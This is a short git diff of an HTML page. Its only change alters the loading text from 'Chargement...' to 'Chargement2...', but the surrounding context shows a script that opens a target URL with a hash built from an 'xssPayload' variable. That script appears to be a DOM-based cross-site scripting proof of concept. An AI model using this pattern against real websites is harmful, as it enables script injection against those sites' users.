--- a/index.html
+++ b/index.html
@@ -10,6 +10,6 @@
     const maliciousHash = "#<div id='output'>" + xssPayload + "</div>";
     const newWindow = window.open(targetURL + maliciousHash);
   </script>
-  <p>Chargement...</p>
+  <p>Chargement2...</p>
 </body>
 </html>
